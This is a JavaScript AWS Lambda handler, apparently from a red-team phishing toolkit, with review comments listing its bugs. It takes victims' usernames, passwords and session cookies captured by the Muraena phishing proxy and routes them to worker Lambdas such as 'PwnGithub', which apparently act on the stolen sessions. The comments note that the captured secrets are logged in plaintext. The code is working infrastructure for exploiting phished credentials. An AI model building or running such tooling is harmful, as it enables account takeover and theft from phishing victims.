handler.js
const AWS = require("aws-sdk");
/**
 * Lambda entry point that routes a captured-session record to a per-provider
 * worker Lambda, chosen by `task.type` in the JSON request body.
 *
 * The body is read as JSON with the fields `task.type`, `username`,
 * `password` and `cookies` (the comment below points at Muraena's
 * instrument.necro for the full layout).
 *
 * Review notes, all traceable to the lines below:
 *  - No check on who the caller is appears in this handler; if one exists it
 *    is enforced elsewhere (for example at the HTTP front end) — TODO confirm.
 *  - The "github" branch logs `params`, whose Payload is the whole request
 *    body, so the captured username, password and cookies are written to the
 *    function's log output in plaintext. The "test" branch logs the username.
 *  - The 400 branch does not return, so execution continues past it.
 *  - `callback` can be invoked more than once per request (400 + finally,
 *    debug + finally, catch + finally). NOTE(review): presumably only the
 *    first call decides the response — confirm against the runtime.
 *  - Errors reported by `lambda.invoke` are ignored in both branches.
 *
 * @param {object} event - Invocation event; only `event.body` (a JSON string) is read.
 * @param {object} context - Lambda context; unused.
 * @param {Function} callback - Node-style callback receiving `{ statusCode, body }`.
 */
module.exports.pwn = (event, context, callback) => {
var lambda = new AWS.Lambda();
// The request body is expected to carry every instrumentation value needed downstream.
// https://github.com/muraenateam/muraena/blob/master/config/instrument.necro
// Reject a missing body or a missing task.type with HTTP 400.
// NOTE(review): a body that parses but has no `task` object makes `.task.type`
// throw a TypeError here, outside the try block below; malformed JSON throws too.
if (event.body == null || JSON.parse(event.body).task.type == undefined ) {
callback(null, {
statusCode: 400,
body: JSON.stringify({ message: "Try hard, you can pwn someone :)"})
});
// No `return` here: the statements below still run after the 400 is sent.
};
// Read the routing key and the captured values from the body.
// These are the parameters sent on to the other Lambdas.
// The body is re-parsed for each field rather than parsed once.
const Provider = JSON.parse(event.body).task.type;
const stolenLogin = JSON.parse(event.body).username;
const stolenPass = JSON.parse(event.body).password;
// Read here but not referenced again in this handler; the "github" branch
// forwards cookies only as part of the whole body.
const stolenCookies = JSON.parse(event.body).cookies;
// Semi-orchestration based on the task.type forwarded by Muraena.
try {
if (Provider === "github") {
var params = {
// FunctionName is based on what you defined in serverless.yml
FunctionName: "lambda-pwnppeteer-dev-PwnGithub",
// "Event" = asynchronous invocation: the worker's result is not awaited.
InvocationType: "Event",
// Re-serialises the entire request body, credentials and cookies included.
Payload : JSON.stringify(JSON.parse(event.body)),
};
lambda.invoke(params, function(error, data) {
// `error` is never inspected, so a failed invoke is still logged as "called".
// Logging `params` puts the full payload (captured secrets) into the logs.
console.log(params);
console.log(`Github Lambda has been called`);
});
};
// Just to check the Lambda deployment.
if (Provider === "debug") {
console.log(`message: Debug provider`);
callback(null, {
statusCode: 200,
body: JSON.stringify({
message : "Debug provider"
})
});
};
if (Provider === "test") {
// Second `var params` in the same function scope; `var` permits the redeclaration.
var params = {
FunctionName: "lambda-pwnppeteer-dev-PwnSNK",
//InvocationType: "RequestResponse",
// Async mode set to "Event"
InvocationType: "Event",
// Unlike the "github" branch, only the login and password are forwarded.
Payload : JSON.stringify({
message: 'test lambda executed successfully!',
login: stolenLogin,
password: stolenPass,}),
};
lambda.invoke(params, function(error, data) {
// `error` and `data` are unused; the captured username goes to the log.
console.log(`Test lambda executed for ${stolenLogin}`);
//const response = {
//statusCode: 200,
//body: 'proof: ' + JSON.parse(data.Payload)
//};
//callback(null, response)
});
};
} catch (error) {
// Only synchronous throws inside the try reach this point; invoke failures
// arrive in the invoke callbacks above, not here.
callback(error);
} finally {
// Runs on every path, including after the debug response and after the catch,
// so a second callback invocation with HTTP 200 always follows.
console.log("Orchestration done!");
callback(null, {
statusCode: 200,
body: JSON.stringify({
message : "Orchestration on-going..."
})
});
};
};